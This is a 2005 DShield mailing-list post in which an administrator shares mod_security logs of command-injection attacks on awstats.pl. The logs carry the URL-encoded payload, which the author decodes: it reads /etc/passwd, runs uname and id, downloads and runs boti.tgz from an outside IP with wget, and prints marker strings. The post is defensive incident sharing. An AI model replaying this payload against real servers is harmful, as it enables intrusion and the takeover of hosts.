[Dshield] awstats exploits

Andy Brown andy.brown at interv8.co.uk
Thu Mar 17 11:02:37 GMT 2005


We're getting lots of awstats exploits at present, is anyone else getting them 
at present as we're getting hit almost hourly by various IPs all over 
(looking like exploited adsl systems)

I've now installed mod_security to keep tabs/block these things
Raw logs of the attacks:

Request: 62.177.120.22 - - [17/Mar/2005:04:04:29 +0000] "GET 
/cgi/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcat%20%2fetc%2fpasswd%3buname%20%2da%3bid%3becho%20Muie%3bcd%20%2fvar%2ftmp%3bwget%20http%3a%2f%2f208%2e53%2e164%2e135%2fboti%2etgz%3btar%20xzvf%20boti%2etgz%3bcd%20ls%3b%2e%2finit%3becho%20%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%3becho%20GAta%20BHa%20%21%21%3becho%20e_exp%3b%2500 
HTTP/1.1" 500 540
Handler: (null)
----------------------------------------
GET 
/cgi/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcat%20%2fetc%2fpasswd%3buname%20%2da%3bid%3becho%20Muie%3bcd%20%2fvar%2ftmp%3bwget%20http%3a%2f%2f208%2e53%2e164%2e135%2fboti%2etgz%3btar%20xzvf%20boti%2etgz%3bcd%20ls%3b%2e%2finit%3becho%20%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%3becho%20GAta%20BHa%20%21%21%3becho%20e_exp%3b%2500 
HTTP/1.1
Accept: */*
Connection: close
Host: 217.22.154.14
mod_security-message: Access denied with code 500. Pattern match "wget" at 
THE_REQUEST.
mod_security-action: 500

HTTP/1.1 500 Internal Server Error
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
========================================
Request: 62.177.120.22 - - [17/Mar/2005:04:04:30 +0000] "GET 
/awstats/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcat%20%2fetc%2fpasswd%3buname%20%2da%3bid%3becho%20Muie%3bcd%20%2fvar%2ftmp%3bwget%20http%3a%2f%2f208%2e53%2e164%2e135%2fboti%2etgz%3btar%20xzvf%20boti%2etgz%3bcd%20ls%3b%2e%2finit%3becho%20%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%3becho%20GAta%20BHa%20%21%21%3becho%20e_exp%3b%2500 
HTTP/1.1" 500 540
Handler: cgi-script
----------------------------------------
GET 
/awstats/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcat%20%2fetc%2fpasswd%3buname%20%2da%3bid%3becho%20Muie%3bcd%20%2fvar%2ftmp%3bwget%20http%3a%2f%2f208%2e53%2e164%2e135%2fboti%2etgz%3btar%20xzvf%20boti%2etgz%3bcd%20ls%3b%2e%2finit%3becho%20%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%3becho%20GAta%20BHa%20%21%21%3becho%20e_exp%3b%2500 
HTTP/1.1
Accept: */*
Connection: close
Host: 217.22.154.14
mod_security-message: Access denied with code 500. Pattern match "wget" at 
THE_REQUEST.
mod_security-action: 500

HTTP/1.1 500 Internal Server Error
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
========================================
Request: 62.177.120.22 - - [17/Mar/2005:04:04:30 +0000] "GET 
/stat-cgi/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcat%20%2fetc%2fpasswd%3buname%20%2da%3bid%3becho%20Muie%3bcd%20%2fvar%2ftmp%3bwget%20http%3a%2f%2f208%2e53%2e164%2e135%2fboti%2etgz%3btar%20xzvf%20boti%2etgz%3bcd%20ls%3b%2e%2finit%3bcho%20%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%3becho%20GAta%20BHa%20%21%21%3becho%20e_exp%3b%2500 
HTTP/1.1" 500 540
Handler: (null)
----------------------------------------
GET 
/stat-cgi/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcat%20%2fetc%2fpasswd%3buname%20%2da%3bid%3becho%20Muie%3bcd%20%2fvar%2ftmp%3bwget%20http%3a%2f%2f208%2e53%2e164%2e135%2fboti%2etgz%3btar%20xzvf%20boti%2etgz%3bcd%20ls%3b%2e%2finit%3bcho%20%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%3becho%20GAta%20BHa%20%21%21%3becho%20e_exp%3b%2500 
HTTP/1.1
Accept: */*
Connection: close
Host: 217.22.154.14
mod_security-message: Access denied with code 500. Pattern match "wget" at 
THE_REQUEST.
mod_security-action: 500

HTTP/1.1 500 Internal Server Error
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
========================================
Request: 62.177.120.22 - - [17/Mar/2005:04:04:31 +0000] "GET 
/awstats/perl/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcat%20%2fetc%2fpasswd%3buname%20%2da%3bid%3becho%20Muie%3bcd%20%2fvar%2ftmp%3bwget%20http%3a%2f%2f208%2e53%2e164%2e135%2fboti%2etgz%3btar%20xzvf%20boti%2etgz%3bcd%20ls%3b%2e%2finit%3becho%20%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%3becho%20GAta%20BHa%20%21%21%3becho%20e_exp%3b%2500 
HTTP/1.1" 500 540
Handler: cgi-script
----------------------------------------
GET 
/awstats/perl/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcat%20%2fetc%2fpasswd%3buname%20%2da%3bid%3becho%20Muie%3bcd%20%2fvar%2ftmp%3bwget%20http%3a%2f%2f208%2e53%2e164%2e135%2fboti%2etgz%3btar%20xzvf%20boti%2etgz%3bcd%20ls%3b%2e%2finit%3becho%20%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%2d%3becho%20GAta%20BHa%20%21%21%3becho%20e_exp%3b%2500 
HTTP/1.1
Accept: */*
Connection: close
Host: 217.22.154.14
mod_security-message: Access denied with code 500. Pattern match "wget" at 
THE_REQUEST.
mod_security-action: 500



The url-encoded bit turns into:
cat /etc/passwd;
uname -a;
id;
echo Muie;
cd /var/tmp;
wget http://208.53.164.135/boti.tgz;
tar xzvf boti.tgz;
cd ls;
./init;
echo -------------------------;
echo GAta BHa !!;
echo e_exp


And I managed to get a copy of boti.tgz which is just an irc server.


-- 
Regards,
Andy <andy @ thebmwz3.co.uk>  http://www.thebmwz3.co.uk/




More information about the list mailing list